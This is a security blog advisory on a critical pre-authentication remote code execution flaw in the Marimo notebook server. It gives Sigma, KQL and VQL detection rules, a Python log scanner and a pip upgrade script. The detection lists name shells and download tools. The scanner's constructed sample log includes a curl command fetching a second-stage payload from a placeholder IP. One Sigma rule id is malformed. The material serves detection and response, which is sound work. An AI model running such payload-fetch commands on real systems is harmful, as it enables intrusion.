
CVE-2026-39987: Critical Marimo Pre-Auth RCE Exploited in the Wild — Detection and Response

Security Arsenal Team
April 10, 2026
5 min read

A critical security vulnerability has been identified in Marimo, an open-source Python-based reactive notebook used for data science and analysis. Tracked as CVE-2026-39987 (CVSS 9.3), this pre-authenticated remote code execution (RCE) flaw allows attackers to execute arbitrary code on the host server without requiring any credentials or user interaction.

According to findings from Sysdig, active exploitation began within 10 hours of public disclosure. Given Marimo's typical deployment in data pipelines and research environments—often with high privileges—this vulnerability represents a severe risk of supply-chain compromise and data exfiltration. Defenders must assume that unpatched instances are currently being targeted.

Technical Analysis

  • CVE Identifier: CVE-2026-39987
  • CVSS Score: 9.3 (Critical)
  • Affected Products: Marimo (Open-source Python notebook)
  • Affected Versions: All versions prior to the latest security patch (vendor advisory confirms all previous iterations are vulnerable).
  • Vulnerability Type: Pre-authenticated (unauthenticated) Remote Code Execution.

How the Vulnerability Works: The flaw exists in the core server component of the Marimo application. Due to insufficient validation on specific input vectors, an attacker can send a crafted malicious request to the listening Marimo server interface. This request bypasses authentication mechanisms and directly triggers an interpreter, allowing for the execution of arbitrary system commands.

Exploitation Status: There is confirmed active exploitation in the wild. Security researchers have observed attackers scanning for exposed Marimo instances and leveraging this flaw to drop webshells or cryptocurrency miners immediately following the publication of the proof-of-concept (PoC).

Detection & Response

The following detection mechanisms focus on the behavioral indicators of exploitation. Since Marimo is a development tool, it typically should not spawn system shells (like /bin/bash) or network utilities (like curl or wget) on its own in a production environment.

SIGMA Rules

---
title: Marimo Exploitation - Suspicious Shell Spawn
id: 9e5b7c1d-2a4f-4b8c-9d6e-1f3g5h7i9j0k
status: experimental
description: Detects the Marimo application spawning a shell process, a strong indicator of successful RCE exploitation.
references:
  - https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith: '/marimo'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/zsh'
      - '/dash'
  condition: selection
falsepositives:
  - Legitimate developer debugging (rare in production containers)
level: high
---
title: Marimo Exploitation - Network Utility Execution
id: 0a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects Marimo spawning curl or wget, often used to download second-stage payloads or reverse shells.
references:
  - https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith: '/marimo'
    Image|endswith:
      - '/curl'
      - '/wget'
      - '/python'
  condition: selection
falsepositives:
  - Data fetching functionality within a notebook (verify with user)
level: medium
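
The two Sigma rules above, applied in code over sample process-creation events, as an added example that is not part of the original advisory: it assumes JSON-lines telemetry keyed with the Sigma field names (ParentImage, Image, CommandLine, Timestamp) and constructs its own sample events.

```python
import json
from typing import Iterable, List, Optional

# Process names taken from the two Sigma rules above: shell spawn (high), tool fetch (medium).
SHELLS = {"bash", "sh", "zsh", "dash"}
NET_TOOLS = {"curl", "wget", "python"}

def classify(event: dict) -> Optional[dict]:
    """Return an alert if a process-creation event matches either rule, else None.
    Assumed schema: JSON object with Sigma-style keys ParentImage, Image, CommandLine, Timestamp."""
    parent = event.get("ParentImage", "")
    image = event.get("Image", "")
    if not parent.endswith("/marimo"):
        return None  # only children of the marimo process are in scope
    name = image.rsplit("/", 1)[-1]  # mirrors Image|endswith: '/<name>' (so 'python3' is NOT matched)
    if name in SHELLS:
        rule, level = "Marimo Exploitation - Suspicious Shell Spawn", "high"
    elif name in NET_TOOLS:
        rule, level = "Marimo Exploitation - Network Utility Execution", "medium"
    else:
        return None
    return {"rule": rule, "level": level, "timestamp": event.get("Timestamp"),
            "image": image, "cmdline": event.get("CommandLine", "")}

def scan(lines: Iterable[str]) -> List[dict]:
    """Apply classify() to each JSON line; malformed lines are skipped rather than aborting the hunt."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = classify(event)
        if alert:
            alerts.append(alert)
    return alerts

# Constructed sample telemetry (not real logs): a shell spawn, a curl fetch, an unrelated
# sshd child, a python child of marimo (legitimate kernel work looks like this too) and a bad line.
SAMPLE_LOG = """
{"Timestamp": "2026-04-06T11:02:13Z", "ParentImage": "/opt/venv/bin/marimo", "Image": "/usr/bin/bash", "CommandLine": "bash -c id"}
{"Timestamp": "2026-04-06T11:02:15Z", "ParentImage": "/opt/venv/bin/marimo", "Image": "/usr/bin/curl", "CommandLine": "curl -o /tmp/stage http://203.0.113.10/stage"}
{"Timestamp": "2026-04-06T11:03:00Z", "ParentImage": "/usr/sbin/sshd", "Image": "/usr/bin/bash", "CommandLine": "bash"}
{"Timestamp": "2026-04-06T11:03:05Z", "ParentImage": "/opt/venv/bin/marimo", "Image": "/opt/venv/bin/python", "CommandLine": "python -c pass"}
this line is not JSON
"""
```

Because it mirrors the rules' endswith matches exactly, an interpreter named python3 is not flagged; widen NET_TOOLS if your Marimo virtualenv uses that name, and expect the python match to need the same user verification the second rule's falsepositives entry calls for.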

Microsoft Sentinel / Defender KQL

// Hunt for suspicious child processes spawned by Marimo
DeviceProcessEvents
| where InitiatingProcessFileName has "marimo"
| where FileName in~ ("sh", "bash", "dash", "zsh", "curl", "wget", "python", "perl")
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, FileName, CommandLine, ProcessId
| order by Timestamp desc

Velociraptor VQL

-- Hunt for suspicious child processes of Marimo
SELECT Pid, Name, CommandLine, Exe, Username, CreateTime
FROM pslist()
WHERE ParentName =~ 'marimo'
  AND Name IN ('bash', 'sh', 'dash', 'zsh', 'curl', 'wget', 'python3', 'perl')

Remediation Script (Bash)

#!/bin/bash
# Remediation script for CVE-2026-39987
# Checks for a Marimo installation and upgrades it to the patched version via pip

# Function to check if a command exists
command_exists() {
    command -v "$1" >/dev/null 2>&1
}

if command_exists marimo; then
    echo "[+] Marimo installation detected."
    echo "[+] Current Version Info:"
    # 'pip' must belong to the same interpreter/virtualenv that provides the 'marimo' binary
    pip show marimo | grep Version

    echo "[*] Attempting to upgrade Marimo via pip to patch CVE-2026-39987..."

    # Attempt upgrade; the if tests pip's exit status directly
    if pip install --upgrade marimo; then
        echo "[+] Upgrade successful. Please verify the version below matches the latest advisory:"
        pip show marimo | grep Version
        echo "[!] ACTION REQUIRED: Restart the Marimo service to apply changes."
    else
        echo "[-] Upgrade failed. Ensure you have permissions or run with sudo."
        exit 1
    fi
else
    echo "[-] Marimo binary not found in PATH. No action taken."
fi

Remediation

  1. Immediate Patching: The highest priority is to update Marimo to the latest version immediately. This vulnerability affects all versions prior to the security patch released by the vendor. Run the remediation script above or execute pip install --upgrade marimo manually.
  2. Network Segmentation: Ensure Marimo notebooks are not exposed directly to the public internet. If external access is required, place the application behind a reverse proxy with strict authentication and IP allow-listing.
  3. Runtime Integrity: For environments that cannot be patched immediately, implement strict egress filtering. The Marimo process should not be initiating outbound connections to the internet or non-approved internal endpoints.
  4. Investigate Compromise: Given the 10-hour window to exploitation, assume unpatched instances exposed to the internet may already be compromised. Review process logs for the presence of unauthorized shells or Python processes spawned by the marimo parent process.
